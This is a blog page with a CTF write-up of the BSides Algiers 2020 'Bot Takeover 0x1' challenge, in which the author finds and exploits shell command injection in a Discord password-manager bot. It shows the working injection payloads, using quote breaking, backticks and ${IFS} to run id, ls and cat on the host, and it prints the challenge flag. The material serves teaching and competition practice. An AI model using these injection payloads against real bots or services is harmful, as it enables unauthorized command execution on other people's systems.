<!doctype html>
<html>
<head>
	<meta charset="utf-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>M4t35Z's Blog - basic edition</title>
	<link rel="stylesheet" type="text/css" href="//m4t3sz.gitlab.io/bsc/style.css"/>
</head>

<div id="header">
	<a id="headerLink" href="//m4t3sz.gitlab.io/bsc/">m4t3sz.gitlab.io/bsc</a>
	<span> - </span>
	<span id="headerSubtitle">M4t35Z's Blog - basic edition</span>
</div>
<hr />
<div id="menu">
	<a href="//m4t3sz.gitlab.io/"><b>home</b></a>
	<a href="//twitter.com/szilak44/">twitter</a>
	<a href="//github.com/matesz44/">github</a>
	<a href="//github.com/matesz44/dotfiles/">dotfiles</a>
	<a href="//github.com/matesz44/scripts/">scripts</a>
	<span class="right">
		<a href="//gitlab.com/m4t3sz/sites/">source</a>
	</span>
</div>
<hr />
<div id="content">
<div id="nav">
	<ul>
	<li><a href="/bsc">about</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/showcase/">showcase/</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/writeup/"><b>>writeup/</b></a>
		<ul>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/bug/">bug/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/"><b>>ctf/</b></a>
			<ul>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/2020/"><b>>2020/</b></a>
				<ul>
				<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/2020/bsides_algiers/"><b>>bsides algiers/</b></a>
					<ul>
					<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/2020/bsides_algiers/bot_takeover_0x1/"><b>>bot takeover 0x1/</b></a>
						<ul>
						<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/2020/bsides_algiers/bot_takeover_0x1/img/">img/</a></li>
						</ul>
					</li>
					</ul>
				</li>
				</ul>
			</li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/2021/">2021/</a></li>
			</ul>
		</li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/">htb/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/">thm/</a></li>
		</ul>
	</li>
	</ul>
</div>
<hr />
<div id="main">

<h1>Bot Takeover - 0x1 - 500 - 1st blood</h1>
<h2>Why this</h2>
<blockquote><p>This was a <a href="https://ctf.bsidesalgiers.com">ctf.bsidesalgiers.com</a> challenge by <a href="https://shellmates.club/">shellmates.club/</a>.</p>
</blockquote>
<p>So I woke up and saw some new challenges posted and I picked this from the misc category because it seemed interesting.</p>
<p>Btw this was an awesome pick this challenge was really enjoyable thanks to the authors :D
<ul>
<li><strong>Ouxs</strong>: <a href="https://github.com/ouxs-19/">https://github.com/ouxs-19/</a></li>
<li><strong>Malik</strong>: <a href="https://github.com/malikDaCoda/">https://github.com/malikDaCoda/</a></li>
</ul>
</p>
<h1>Enumeration</h1>
<p>I had its username <code>mate#1392</code> BOT and its description was <em>!mate</em> so I DM-ed the bot with <code>!mate</code>.</p>
<p>I got back some info:<br />
<img src="img/mate.png" alt="mate" /></p>
<p>Hmm, there is a <code>!help</code> command. Let's try it:</p>
<pre><code>Mate - The Password Manager Bot

Commands:
  help     Shows this message
  login    Login into your account.
  mate     Bot description
  register Register your account.

Type !help command for more info on a command.
You can also type !help category for more info on a category.
</code></pre>
<p>I registered with <code>!register 1337password</code> (the defaults) and got access to more functionality:</p>
<pre><code>Mate - The Password Manager Bot

Commands:
  add    Add a new entry of credentials for specified URL
  delete Delete entry specified by URL
  help   Shows this message
  logout Log out of your account
  mate   Bot description
  update Update credentials entry of specified URL
  view   View creds associated to URL (view all if no URL is provided)

Type !help command for more info on a command.
You can also type !help category for more info on a category.
</code></pre>
<h3>Trying out the functionalities</h3>
<p>Now, I tried everything one-by-one and I tried to spot interesting behaviour that could lead to either <strong>code injection</strong> or <strong>source leak</strong> or <strong>leakage of other user's credentials</strong>.</p>
<pre><code>!add https://test.com/ asd fgh
</code></pre>
<pre><code>!view https://test.com/
</code></pre>
<p><img src="img/testview.png" alt="tesview" /></p>
<pre><code>https://test.com/
username
asd
password
fgh
</code></pre>
<ul>
<li><code>add</code> takes 3 arguments a link(which need to start with <code>https://</code> and end with <code>.com</code>) a username and a password</li>
</ul>
<h3>Breaking it</h3>
<pre><code>!view https://*asd*
No credentials found for https://*asd*
</code></pre>
<ul>
<li>FAIL</li>
</ul>
<pre><code>!view `'
No credentials found for &lt;`'&gt;
</code></pre>
<ul>
<li>FAIL but different(<code>&lt;mychars&gt;</code>)</li>
</ul>
<pre><code>!add https://asd.asd/ asd fgh bnm
Credentials added for https://asd.asd/
!view https://asd.asd/
https://asd.asd/
username
asd
password
fgh
</code></pre>
<ul>
<li>The last argument got ignored!</li>
</ul>
<p>Then I searched for openssl file read vulns because the challenge literally spammed it's <em>using openssl</em>.</p>
<pre><code>!add https://oof.com/ asd fgh enc -in &quot;/etc/passwd&quot;
https://oof.com/
username
asd
password
fgh
</code></pre>
<p>I tried some of it but none of them worked because the code ignored the args after the pass(2nd arg).</p>
<p>But then I tried using ' and " to group the arguments(asd fgh --&gt; 2 arg, but 'asd fgh' --&gt; 1 arg) it broke:</p>
<pre><code>!add https://oof.com/ asd 'enc -in &quot;/etc/passwd&quot;'
Encryption Error
/bin/sh: 1: Syntax error: Unterminated quoted string
</code></pre>
<ul>
<li>OOOKAY, I got an error related to my quotes</li>
<li>It uses <code>/bin/sh</code> so <strong>command injection should be possible</strong></li>
</ul>
<h2>Trying to inject sh commands</h2>
<p>I tried some basic command injections:</p>
<pre><code>!add https://oof2.com/ asd `id`
Credentials added for https://oof2.com/
https://oof2.com/
username
asd
password
`id`
</code></pre>
<p><img src="img/cmdfail1.png" alt="cmdfail1" />
<ul>
<li>NOPE</li>
<li>My backticks got reflected and discord parsed them correctly</li>
</ul>
</p>
<p>I thought <em>I MUST BREAK the code then construct it again</em> with my malicious code added in.</p>
<pre><code>!add https://tasd.com/ asd';||asd asdf'
Encryption Error
/bin/sh: 1: Syntax error: &quot;||&quot; unexpected
</code></pre>
<ul>
<li>DIFFERENT ERROR but still an error :/</li>
</ul>
<pre><code>!add https://tasd5.com/ asd';asd'ayy asdf
Encryption Error
base64: invalid input
bad magic number
</code></pre>
<ul>
<li>DIFFERENT ERROR again</li>
<li>The program uses base64 too</li>
<li>But still not enough information</li>
</ul>
<pre><code>!add https://tasd6.com/ asd'+';id'+'ayy asdf
https://tasd6.com/
username
asd+;id+ayy
password
asdf
</code></pre>
<ul>
<li>It removes my singlequotes(<code>'</code>) from the output!</li>
<li>This means somehow it gets interpreted</li>
</ul>
<pre><code>!add https://a2asd.com/ asd'`asd`'ayy asdf
https://a2asd.com/
username
asdayy
password
asdf
</code></pre>
<ul>
<li>My injection(the line below) got removed and the program successfully ran</li>
</ul>
<pre><code>'`asd`'
</code></pre>
<p>Now I tried injecting a valid sh command like <code>id</code>:</p>
<pre><code>!add https://a3asd.com/ asd'`id`'ayy asdf
https://a3asd.com/
username
asduid=1000(mate) gid=1000(mate) groups=1000(mate)ayy
password
asdf
</code></pre>
<p><img src="img/id_success.png" alt="id_success" />
<ul>
<li>YESSSS, got command execution!</li>
<li>I am <code>mate</code> on the box!</li>
</ul>
</p>
<h2>Exploitation, getting the flag</h2>
<p>Okay, so I got an rce but I need to get the flag somehow so I ran <code>ls</code>.</p>
<pre><code>!add https://a3asd2.com/ asd'`ls`'ayy asdf
https://a3asd2.com/
username
asddata.db db_handlers.py flag.txt matebot.pyayy
password
asdf
</code></pre>
<ul>
<li>The files are <code>data.db</code>, <code>db_handlers.py</code>, <code>flag.txt</code> and <code>matebot.py</code></li>
</ul>
<p>So I tried to <code>cat flag.txt</code> but got an error:</p>
<pre><code>!add https://a3asd3.com/ asd'`cat flag.txt`'ayy asdf
Encryption Error
/bin/sh: 1: Syntax error: EOF in backquote substitution
</code></pre>
<ul>
<li>The problem is the space in the middel of my command</li>
<li>But there's a way to bypass this error on unix systems with the use of <code>${IFS}</code>. This is a common shell variable so you can also try running a command on your local machine with this like <code>uname${IFS}-a</code> and you will get the output.</li>
</ul>
<p>Note that I fucked up for first because I used as in bash without the <code>{}</code>'s:</p>
<pre><code>!add https://a3asd3.com/ asd'`cat$IFSflag.txt`'ayy asdf
https://a3asd3.com/
username
asdayy
password
asdf
</code></pre>
<ul>
<li>Yeah, nothing. So from there I started thinking what could go wrong and it just popped into my mind that <code>$IFS</code> could be incompatible with only POSIX compliant shells.</li>
</ul>
<p>So I tried with a compatible <code>${IFS}</code>.
For first I tried with the echo command so I dont have to bypass anything if there is some type of restriction on reading the flag.txt file:</p>
<pre><code>!add https://a3asd7.com/ asd'echo${IFS}oof'ayy asdf
https://a3asd7.com/
username
asdoofayy
password
asdf
</code></pre>
<ul>
<li>GOT IT printed in the output</li>
<li>This means <code>${IFS}</code> works well</li>
</ul>
<p>Time to cat the flag:</p>
<pre><code>!add https://a3asd8.com/ asd'cat${IFS}flag.txt'ayy asdf
username
asdshellmates{ev3n_D1$c0Rd_b0Ts_c4n_b3_vUln3r@ble_t0_c0Mm@nd_1nj3cti0n}ayy
password
asdf
</code></pre>
<ul>
<li>SUCCESS</li>
<li>The flag is <code>shellmates{ev3n_D1$c0Rd_b0Ts_c4n_b3_vUln3r@ble_t0_c0Mm@nd_1nj3cti0n}</code></li>
</ul>
<h2>Last words</h2>
<p>As it says <strong><em>DISCORD BOTS CAN BE VULNERABLE TO COMMAND INJECTION</em></strong> so please think about this when you are copy pasting discord.py sources from stackoverflow ;)</p>
<p>--- <em>I hope you liked this writeup, if so you are free to follow me on twitter <a href="https://twitter.com/szilak44">twitter.com/szilak44</a></em></p>
</div>

</div>

<hr /><hr />
<footer>
	<p>Author: M4t35Z</p>
	<p><a href="https://www.buymeacoffee.com/m4t35z">Support the creator (buymeacoffee)</a></p>
	<p><i>Created with <a href="https://github.com/karlb/smu/">smu</a> + <a href="https://git.suckless.org/sites/">suckless style</a></i></p>
</footer>
</html>
